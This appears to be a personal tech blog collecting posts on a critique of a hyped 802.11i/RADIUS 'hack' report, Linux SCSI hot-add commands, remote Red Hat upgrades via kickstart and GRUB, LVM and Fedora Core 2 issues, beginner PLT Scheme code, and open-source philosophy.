Bogus 802.11i Hack

The other day my boss forwards me a link to an eWeek article entitled “WLAN’s Exposed by Hack”.

We’ve just recently deployed a secure wireless infrastructure (using 802.1x) with the intent of upgrading to 802.11i when 802.11i supplicants start to become available. So of course I was concerned to hear there might be a “hack” for 802.11i security.

Unfortunately, the supposed “hack” was more hype than hack. The article started out promising:

A wireless LAN hardware company is set to publicize a RADIUS server security hack that can thwart the recently ratified 802.11i protocol and any WLAN infrastructure that keeps encryption keys housed in access points rather than on a central switch.

Aruba Wireless Networks Inc. will bring its findings to the Internet Engineering Task Force meeting in San Diego next week, said Aruba officials.

Aruba stands to benefit from the vulnerability report because it develops wireless hardware that keeps encryption centralized on the switch rather than on access points, but officials said the vulnerability is critical for IT managers who think the new protocol will keep their WLANs secure all by itself.

Unfortunately, things went downhill quickly from there. The first sign of trouble is this sentence: “The attack needs access to a company’s internal network”. What? The attacker already has access to your internal network? Sounds like wireless security isn’t your biggest concern….

But wait! It gets worst!

The attack needs access to a company’s internal network, to which a cracker would attach a rogue access point, perform ARP (Address Resolution Protocol) poisoning to sniff the traffic between the access point and the gateway, then send a deauthentication packet to a client. When the client reauthenticates, the access point sends a request to the RADIUS (Remote Authentication Dial-In User Service) server, which accepts the user and passes the encrypted keys to the access point. To get the RADIUS server’s shared secret, a hacker can perform an offline dictionary attack on the server, using a tool such as Cain and Abel, according to Aruba officials.

It sounds like Aruba went *way* off the deep end trying to claim that their product solves a pseudo “vulnerability” that nobody else does, and unfortunately the reporters at eWeek seem to have uncritically accepted this steaming load of FUD. This reflects rather poorly on eWeeks reliability, as anyone spending more than a moments thought on Aruba’s claim will notice the following two glaring errors:

1) Despite being publicized as an “802.11i” weakness, this really has nothing to do with the 802.11i protocol. It’s a Radius weakness that’s been know for almost as long as Radius has existed. Strong shared secrets and authentication retry limits on the Radius server can be used to effectively mitigate this issue and have been used for many years.

2) If you’ve got a hostile who’s already connected to your internal network, is running a sniffer, using an offline dictionary tool against the traffic he/she has sniffed, and is using ARP poisoning to impersonate critical network devices/servers, then I don’t think you OR the attacker are going to be very concerned about your wireless infrastructure. Particularly since it’s standard practice to rotate the wireless encryption keys, so the keys the attacker sniffed will only be good for a limited time.

This isn’t really a vulnerability. This is negative vendor hype at it’s worst. Aruba should be ashamed of themselves for stooping to such blatant fear mongering. And eWeek should be ashamed for blindly and unquestioningly accepting Aruba’s dubious information.

How to activate and de-activate a scsi drive under Linux

I came across these commands because I wanted to add a new drive (not replace, add) to a Linux system that has hot-swap scsi drives. When I put the new drive in the OS couldn’t see it. I finally found out the command below to “activate” the drive so that you can use it.

Activate the drive:

echo "scsi add-single-device    " > /proc/scsi/scsi

for example:

echo "scsi add-single-device 0 00 01 00" > /proc/scsi/scsi

Deactivate the drive:

echo "scsi remove-single-device    " /proc/scsi/scsi

for example:

echo "scsi remove-single-device 0 0 1 0" /proc/scsi/scsi

See what drives are active:

cat /proc/scsi/scsi
for example:
[root@hostname root]# cat /proc/scsi/scsi
Attached devices:
Host: scsi0 Channel: 00 Id: 00 Lun: 00
  Vendor: COMPAQ   Model: MAB3091SC        Rev: 0814
  Type:   Direct-Access                    ANSI SCSI revision: 02

Gentoo MacOS Considered Harmful

I read with some interest this post on Slashdot regarding Gentoo MacOS. Apparently the fine folks at Gentoo have ported their package tool (Portage) to run under Mac OSX. You can then use Portage to compile and install a wide variety of Unix program on OSX.

Great! I thought. Fink does something very similar, but uses Debian based tools. I’m a total Unix geek, so I use Fink a *lot* to install some of my favorite Unix Free Software onto my OSX Powerbook. Competition is always good, so I was initially looking forward to trying Gentoo MacOS.

Until, that is, I read this little gem on their webpage:

Gentoo MacOS is very new and very Alpha. Portage installs things in / and could possibly overwrite important packages that were installed by OS X. Use this technology at your own risk!”

WTF? I’m hoping this is just an Alpha version problem and they’re planning to fix it. Because allowing a third party program to overwrite OSX installed system binaries is mind numbingly stupid.

Gentoo MacOS should work like Fink, and install all of it’s software to a separate subdirectory and leave the original OS files *alone*. Overwriting the vendor supplied binaries is just inviting disaster.

Until they get this fixed, I certainly won’t be installing Gentoo MacOS on *my* Mac. And I recommend that everyone else avoid it also.

Three Hello Worlds

The classic first program in any language is, of course the “Hello World” program. Here then, are three different version of “Hello World” written in PLT Scheme.

Console based (from Teach Yourself Scheme in Fixnum Days):

(begin
  (display "Hello, World!")
  (newline)

Web based (example program that comes with PLT Scheme servlet library):

(require (lib "unitsig.ss")
         (lib "servlet-sig.ss" "web-server"))

(unit/sig () (import servlet^)

  (define the-text "Hello, Web!")

  `(html (head (title ,the-text))
         (body ([bgcolor "white"])
               (p ,the-text))))

And finally, GUI Based (written by me):

(define greeting "Hello world!")
(define frame (instantiate frame% (greeting)))
(define msg (instantiate message% (greeting frame)))
(send frame show #t)

I still don’t know what the hell I’m doing, but it’s a start right?

Remote Upgrading Redhat Servers

I’ve figured out a decent way to remotely upgrade Redhat/Fedora systems without requiring anyone to physically touch the remote system (ie, no boot disk, etc). I came up with this procedure to upgrade some DNS servers at work. They’re in several different cities, and any on site support staff is usually busy with their own work, and seldom have any Linux knowledge.

I’ve tested this procedure upgrading several different versions of Redhat to Fedora Core2:

1) Mirror all of the files from the the Fedora CD (or appropriate directory of the Fedora FTP site) to a local file server. Share those file via anonymous FTP.

2) The files used to boot the version of linux for the installer are in the directory /isolinux of the install tree. Copy the kernel file (vmlinuz) and the initial ramdisk (initrd.img) to the /boot directory of the target machine (the one you’ll be trying to upgrade).

3) create a kickstart file to automate the upgrade. The kickstart file is necessary to tell the install program (anaconda) where to find the RPMS, whether to use DHCP, etc. Copy the kickstart file to the /boot directory of the target machine.
A sample kickstart file can be found here.

4) edit the /etc/grub.conf file on the target machine to tell it to boot from the kernel and initial ramdisk that we copied from the install media. The lines to append to grub.conf will look something like this:

title Upgrade
root (hd0,0)
kernel /boot/upgrade-vmlinuz ks=hd:hda1:/boot/ks.cfg vnc vncconnect= ramdisk_size=8192
initrd /boot/upgrade-initrd.img

In the above example, I copied the vmlinuz file to /boot/upgrade-vmlinuz and the initrd.img to /boot/upgrade-initrd.img. I’ve also passing some command line arguments to the kernel that will be passed to the install program. The first of these, “ks=hd:hda1:/boot/ks.cfg” tells the installer to load our kickstart file from /boot/ks.cfg on hard drive partition hda1. The commands “vnc vncconnect=” tells the installer to use VNC to connect back to my workstation to display the progress of the installation. This part isn’t strictly necessary, but I find it handy to be able to watch the progress of the install. It’ll also allow you to see a lot of possible errors (like not enough diskspace). The ramdisk command may or may not be necessary. I read some newsgroup postings that recommended it.

5) Tell grub to use the “Upgrade” config we just created at the next reboot. The grub boot configurations are numbered from the top of the config to the bottom, starting at 0. So if our config is the second one in the file, it would be config #1. Enter the grub command line by typing “grub”. Then at the grub prompt type “savedefault –default=1 –once” substituting the appropriate grub config number for 1. This tells grub to boot our new config, config #1, as the default on the next reboot, but *to return to the old default for every reboot after that*! This is important, because it means that if the installer has problems (maybe our kickstart is fubarred?) we can reboot back to our original config.

On older versions of Redhat you may get an error message from grub when you type the above command. The “–once” option to savedefault seems to be a patch that Redhat has applied to grub in their more recent distributions. If you’re using an older distribution, you may need to compile and install a more recent grub. I’ve recompiled the latest Fedora grub to work on Redhat 7.2, it may work on other versions. If you want to try it, you can download it here. Install it with “rpm -U grub-0.94-5.i386.rpm”, then run “grub-install “, ie. “grub-install hda”.

6) Start the vncviewer on your workstation “vncviewer –listen”.

7) Reboot the server. Wait nervously for it to connect to your VNC viewer.

More resource for learning Scheme

Found a few more online resource for learning Scheme. They are:

• An Introduction to Scheme and its Implementation . An online, in progress book on Scheme.
• Scheme Tutorial . A fairly brief online tutorial/introduction to Scheme. Looks similar in scope to “Teach Yourself Scheme in Fixnum Days”
• How to Use Scheme. A partially completed book by the authors of How to Design Programs
• The Scheme Programming Language. Online copy of the scheme standard.
• PLT Scheme Cookbook. Not much here yet, but the idea definitely has promise.
• Scheme FAQ

LVM and upgrading to Fedora Core 2

If you’re running the Linux LVM (Logical Volume Manager) and planning to upgrade to Fedora Core 2, I found a couple of caveats to watch out for.

First, LVM allows you to make physical volumes out of hard drive partitions or out of a whole hard drive. Make sure your physical volumes are all partitions. I tried upgrading a machine this morning that had a whole disk as one of its physical volumes. The Fedora Core 2 install program, Anaconda, complained that it couldn’t read the partition table on the drive.

Second, in your /etc/fstab file, specify any logical volumes by full path name (ie. /dev/vg1/var) and not by label (ie. LABEL=/var). Otherwise Anaconda can’t seem to find the volume to mount it. Note that volume labels work fine for normal partitions, just not for LVM volumes.

Trying to learn Scheme

I’ve started trying to learn Scheme, so I’ve installed the DrScheme environment on my PowerBook and I’ve also read through Teach Yourself Scheme in Fixnum Days.

While I was reading Teach Yourself Scheme, it seemed like a very good book, very clear and concise. But then I started trying to learn how to use the Continuations-based Servlet library that PLT Scheme has for writing web based applications and I found out that I’ve still got a ways to go to really understanding Scheme.

I’ve managed to modify some of the example servlets that come with PLT Scheme, but I still don’t feel comfortable enough to start developing something of my own. I think I know enough to be able to *read* basic Scheme programs, but not enough to know how to go about writing my own programs in Scheme.

I’m trying now to decide whether to read How To Design Programs or Structure and Interpretation of Computer Programs. HTDP looks *so* basic it might be hard not to get bored. On the other hand SICP looks quite hard. Any suggestions?

Fedora Core 2 problems

I upgraded a couple of servers at work to Fedora Core 2 last week. On the first server, the upgrade worked great, no problems. On the second server, a Compaq DL380, I ran into a weird problem. After the upgrade, the server would lockup after any network activity larger than pings.

So I could ping the server all day, for example, but as soon as I tried to SSH to it, it’d lock up.

After much experimenting the solution, or workaround at least, was to boot to an non SMP kernel. The DL380 is dual processor capable, but this particular one only has one processor installed.

That’s an adequate workaround for now. Hopefully I won’t need to upgrade that box to a second processor anytime soon!

Open Source Paradigm Shift

Last night I read Tim O’Reilly’s new article “The Open Source Paradigm Shift”. There’s a lot of good stuff in there, and I would definitely recommend it to anyone with an interest in Open Source or even just with an interest in where the IT industry is going.

The article has one of the best explanations I’ve seen of how Open Source software doesn’t reduce value, it helps to create value for the industry as a whole. Open Source software may be accelerating the commoditization of the software industry, but that commoditization was inevitable with or without Open Source.

There’s also some interesting stuff in there about network effects, and how the Open Source development process, Ebay, and Amazon all successfully leverage network effects in similar, but different ways.

For all that I like about the article, there is one point where I hope that O’Reilly is wrong. He says:

The values of the free and open source community are an important part of its paradigm. Just as the Copernican revolution was part of a broader social revolution that turned society away from hierarchy and received knowledge, and instead sparked a spirit of inquiry and knowledge sharing, open source is part of a communications revolution designed to maximize the free sharing of ideas expressed in code.

…..

The lessons of previous paradigm shifts show us a more subtle and powerful story than one that merely pits a gift culture against a monetary culture, and a community of sharers versus those who choose not to participate. Instead, we see a dynamic migration of value, in which things that were once kept for private advantage are now shared freely, and things that were once thought incidental become the locus of enormous value.

To me, the revival of the gift culture is *the* most important part of the Free Software Movement. I hope that the “broader social revolution” that Free Software is part of isn’t just about “a communications revolution”. I hope that it’s about a rediscovery of the values of community, of working together toward a common goal. I hope that it’s about realizing that not everything in life needs to be about money and not everything in life needs to be directed by our employer, the government, or a “corporate sponsor”. We’re more than just “consumers”, or “eyeballs”, or even citizens. We’re people. And people can and should work together, help one another, and sometime even build something wonderful.